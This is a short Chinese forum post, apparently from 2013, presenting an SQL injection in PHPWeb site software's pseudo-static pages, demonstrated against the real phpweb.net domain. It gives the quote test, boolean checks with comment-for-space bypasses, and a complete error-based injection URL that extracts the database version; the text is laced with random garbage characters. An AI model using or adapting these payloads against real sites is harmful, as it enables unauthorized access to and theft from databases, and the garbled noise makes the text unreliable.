phpweb所有的整站程序伪静态页面都存在sql注入
" ~% v/ k* |) a, V2 L8 K
K5 [ u3 u% w3 s2 J主站:http://phpweb.net/
# k& X9 ^- x' F加’检测:. ?5 O: |: c: B- Z' d
6 Y9 S5 }+ r, B# l7 n
http://www.phpweb.net/down/html/?772′.html
6 Z" E9 o( ]6 X4 k+ y1 p8 o
7 Q1 R3 r& W5 H: Q* Y5 T出错
: I4 ~" W# Y; n% W8 X存在注入。4 Z' {( {$ {+ D
不能用空格,只能用/*罗
, R4 V9 N9 o) E9 [1 B/ lhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常4 n8 U6 p4 E, b7 D N: o1 N
/ n& c: ^; S( Hhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.! ~/ Y" n: j/ k# W
爆数据库版本:8 D1 V2 V ~+ }7 k1 A" q
5 _2 t- i) L3 m?- Z2 f7 U# v6 m4 f( E9 @' G
18 g( }6 t) u8 V
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
, u+ x* r8 A6 }- w0 P) b" J! K更新日期: 2013-01-03 13:39:50
; M/ @$ o u5 d' c |
发表于 2013-1-4 19:46:42
收藏
支持
反对